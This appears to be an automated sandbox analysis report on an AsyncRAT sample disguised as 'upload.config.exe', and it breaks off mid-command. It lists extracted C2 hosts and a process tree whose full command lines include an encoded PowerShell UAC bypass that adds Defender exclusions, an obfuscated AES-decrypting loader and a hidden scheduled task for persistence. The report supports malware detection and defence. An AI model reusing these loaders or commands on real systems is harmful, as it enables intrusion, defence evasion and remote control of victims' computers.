Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 19:31

General

  • Target

    upload.config.exe

  • Size

    9.8MB

  • MD5

    7a1eaa75ff1d1e83f564d0e5312a0930

  • SHA1

    91988fcd3ffe2945d614f2141e0124f9ebcd6e01

  • SHA256

    de47ee6f5098830b2569a1f0f889e021a9be2604093e3e157852060d307aa9f2

  • SHA512

    b1d06ffc724e7a393387fb84900af0badf3a84bfe3ea0b2bed27d41f3114586e7b25b9661c2f23476b51b6cf9d5dcb36cf1d807c5441909b2a8315e4d40cc8c7

  • SSDEEP

    49152:Plnb9f3/00iPuJXm6Os/CTu9VnAaZ+6AmX9mQXd0ujFFoyS+km9nmgMfq9+s6ewR:NnF00iPu

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

jt8iyre.localto.net:2101

jt8iyre.localto.net:55644

Mutex

AbAUwI3PK3e3

Attributes
  • delay

    3

  • install

    false

  • install_file

    winserve.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\upload.config.exe
    "C:\Users\Admin\AppData\Local\Temp\upload.config.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /k start AsyncRAT.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3664
      • C:\Users\Admin\AppData\Local\Temp\AsyncRAT.exe
        AsyncRAT.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:756
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /k start 7254_output.vbs
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7254_output.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3328
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1bhio02a\1bhio02a.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1528
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3EA.tmp" "c:\Users\Admin\AppData\Local\Temp\1bhio02a\CSCD25AD4CC2B1A4F18A9B2ACF24C8DA61.TMP"
              6⤵
                PID:2664
            • C:\windows\system32\cmstp.exe
              "C:\windows\system32\cmstp.exe" /au C:\windows\temp\3jm2yug4.inf
              5⤵
                PID:3036
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2808
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$hkZyt=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YeAxa=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($ZjNXA, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $YeAxa.CopyTo($hkZyt); $YeAxa.Dispose(); $ZjNXA.Dispose(); $hkZyt.Dispose(); $hkZyt.ToArray();}function execute_function($param_var,$param2_var){ IEX '$hMSFrZstRXKXXSE=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA=$hMSFrZstRXKXXSE.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$zQ = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $zQ;$UwrDhZatxq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zQ).Split([Environment]::NewLine);foreach ($EN in $UwrDhZatxq) { if ($EN.StartsWith(':: ')) { $Z=$EN.Substring(3); break; }}$payloads_var=[string[]]$Z.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2524
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr519_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_519.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3644
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_519.vbs"
                  6⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:544
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_519.bat" "
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:636
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX 